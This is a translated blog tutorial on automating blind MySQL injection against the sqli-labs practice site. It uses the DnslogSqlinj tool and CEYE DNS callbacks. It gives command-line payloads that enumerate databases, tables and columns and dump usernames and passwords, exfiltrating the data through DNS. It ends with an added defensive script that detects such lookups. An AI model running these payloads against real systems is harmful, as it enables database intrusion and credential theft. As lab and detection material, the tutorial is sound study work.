MySQL injection - blind injection - Dnslog automation (tool) injection

#Tools involved and environment setup

Tool download

https://github.com/ADOOO/DnslogSqlinj

CEYE - Monitor service for security testing (dns domain name interface)

Use Kali

Python 2.7 environment

pip2 install gevent==1.2.2

pip2 install termcolor

Note: see the article "pip installation termcolor failure solution" (B1aK2's blog, CSDN).

If the termcolor installation fails, you can check the solution in the above article.

Enter the two pip2 commands above directly in the Kali terminal to install the dependencies.

#CEYE + DnslogSqlinj usage

First register an account on CEYE.

Click on the upper right corner to open the main interface.

There you will find the Identifier and the API Token, which we will need later.

Open Kali and enter the DnslogSqlinj-master directory.

Edit the config.py file.

Enter the CEYE information from the previous step into it:

Identifier corresponds to Dnsurl

API Token corresponds to apitoken

#Automation statement structure

#Demo case

1. First open the program

Command: sudo python dnslogSql.py

 

2. Get all databases

Payload:

python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" --dbs

Injection statement:

?id=1' and ({}) --+ --dbs

?id=1' --+ : first determine how the parameter is closed; here it is closed with a single quote ('). This tool does not automatically detect injection points, so you need to find the injection point and determine its closing method yourself first.

and ({}): ({}) is the placeholder where the tool puts the injected statement.

--dbs: enumerate all database names.

When we press Enter, the tool sends the ({}) injection statement to the target website at http://192.168.222.142

Get data count: there are currently 9 databases.

The output lists all the databases of the target website.

3. Get all the table names of the specified database (specify to view the security database)

Payload:

python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" --tables

After pressing Enter, the tool retrieves all the table names of the specified database.

A total of 4 tables are shown.

4. Get the column names (view all field information (columns) of the specified data table "users")

Payload:

python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" -T "users" --columns

At this point, all the field information of the users data table is displayed.

5. Dump the data (view all information of username and password)

Payload:

python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" -T "users" -C "username,password" --dump
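
A defender-side check for the activity in steps 2 to 5, added here as an example and not part of the original post or of DnslogSqlinj: it scans a resolver query log for one client resolving many distinct names under a DNS-log callback zone and decodes hex-looking labels for triage. The log format, the threshold, the sample lines and the assumption that leaked values show up as hex-encoded leftmost labels are illustrative.

```python
from collections import defaultdict

# ceye.io is the CEYE service named on this page; add other callback zones you track.
WATCHED_ZONES = {"ceye.io"}
UNIQUE_NAME_THRESHOLD = 3  # assumption: distinct names per client before alerting

def watched_zone(qname):
    """Return the watched zone that qname is a subdomain of, or None."""
    labels = qname.rstrip(".").lower().split(".")
    for i in range(1, len(labels)):  # start at 1 so the bare zone itself is ignored
        zone = ".".join(labels[i:])
        if zone in WATCHED_ZONES:
            return zone
    return None

def decode_label(label):
    """Decode a hex-looking label to printable ASCII for triage, else None."""
    try:
        text = bytes.fromhex(label).decode("ascii")
    except ValueError:  # not hex, odd length, or not ASCII
        return None
    return text if text and text.isprintable() else None

def find_exfil_candidates(lines):
    """Map (client, zone) -> sorted leftmost labels, for clients over the threshold."""
    seen = defaultdict(set)
    for line in lines:
        parts = line.split()
        if len(parts) != 3:  # constructed format: timestamp client qname
            continue
        _, client, qname = parts
        zone = watched_zone(qname)
        if zone:
            seen[(client, zone)].add(qname.lower().split(".")[0])
    return {k: sorted(v) for k, v in seen.items() if len(v) >= UNIQUE_NAME_THRESHOLD}

# Constructed sample log: 10.0.0.5 stands in for the database server and
# "abc123" for a CEYE identifier; neither value comes from the page.
SAMPLE_LOG = """\
2023-04-01T10:00:01 10.0.0.5 7365637572697479.abc123.ceye.io.
2023-04-01T10:00:02 10.0.0.5 7573657273.abc123.ceye.io.
2023-04-01T10:00:03 10.0.0.5 757365726e616d65.abc123.ceye.io.
2023-04-01T10:00:04 10.0.0.9 www.example.com.
2023-04-01T10:00:05 10.0.0.9 abc123.ceye.io.
""".splitlines()

if __name__ == "__main__":
    for (client, zone), labels in find_exfil_candidates(SAMPLE_LOG).items():
        print(client, zone, [(label, decode_label(label)) for label in labels])
```

A database server has little reason to resolve external names at all, so a hit from a database host is worth investigating even below the threshold.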

 

 

 


Origin blog.csdn.net/m0_72755466/article/details/129906413